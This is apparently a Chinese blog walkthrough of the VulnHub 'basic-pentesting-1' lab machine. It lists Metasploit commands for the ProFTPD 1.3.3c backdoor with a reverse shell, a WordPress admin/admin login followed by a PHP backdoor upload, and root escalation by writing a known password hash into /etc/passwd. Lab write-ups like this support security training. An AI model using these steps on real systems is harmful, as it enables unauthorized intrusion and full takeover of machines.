BASIC-PENTESTING-1 靶机提权

basic-pentesting-1

https://www.vulnhub.com/entry/basic-pentesting-1,216/

获取ip地址

端口扫描,服务识别

根据服务版本搜索相关漏洞

通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有

于是使用msf 搜索漏洞模块并利用

use exploit/unix/ftp/proftpd_133c_backdoor

set rhosts 192.168.88.197

set lhost 192.168.88.174

set payload cmd/unix/reverse

exploit

直接获得root权限。

当然还有一个80端口,我们也可以尝试从web去突破

尝试发现一些目录

dirb http://192.168.88.197

在目录/secret/ 下是wordpress 网站

尝试访问,发现存在页面重定向

将网站ip 域名 写入本地hosts 文件,重新访问网站

熟悉的界面

直接进入后台登录界面

直接admin、admin 弱口令进入后台管理界面,免去了爆破的麻烦!

在获得访问权限的前提下通过msf 上传 shellcode

use exploit/unix/webapp/wp_admin_shell_upload

set lhost 192.168.88.174

set rhost 192.168.88.197

set targeturi /secret/

set username admin

set password admin

exploit

可以看到成功上传了php后门,并获得web权限

接下来提权

可以使用linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py

具体细节可以参考:https://www.freebuf.com/articles/system/129549.html

meterpreter > edit /etc/passwd meterpreter 下的edit 类似vim ,并且我们可以编辑/etc/psswd

root:x:0:0:root:/root:/bin/bash 第二位x 是密码占位符,密码加密存储在/etc/shadow,

我们可以假设,此处x 位 密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.

生成密码

openssl passwd -1

密码:admin

$1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1

用生成的密码替换 root的密码

:wq! 保存

shell

进入完整性shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

su root

输入密码 admin

获取root权限

个人博客:www.payload.com.cn

原文地址:https://www.cnblogs.com/micr067/p/12519764.html